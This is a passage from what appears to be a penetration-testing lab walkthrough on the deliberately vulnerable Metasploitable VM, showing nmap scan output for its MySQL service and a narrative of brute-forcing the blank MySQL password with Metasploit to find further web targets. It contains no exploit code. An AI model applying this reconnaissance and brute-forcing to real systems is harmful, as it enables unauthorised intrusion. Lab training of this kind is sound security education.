Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

MySQL

Let's focus on the MySQL service:

3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK

We can brute-force MySQL, then use it to access files on the remote machine.

More info at Metasploitable/MySQL.

Wrapping Up and Moving On

After the nmap scan of the Metasploitable virtual box, we saw many services running, exposing this server's soft underbelly.

We began with MySQL. We were able to use Metasploit to brute-force the MySQL login. This was pretty trivial, since the password was blank.

Now that we've compromised the MySQL database, we've seen that there are several web services running - two instances of TikiWiki, an instance of Damn Vulnerable Web App, and information from/about owasp. The MySQL database gave us plenty of new attack vectors to dive into.

Flags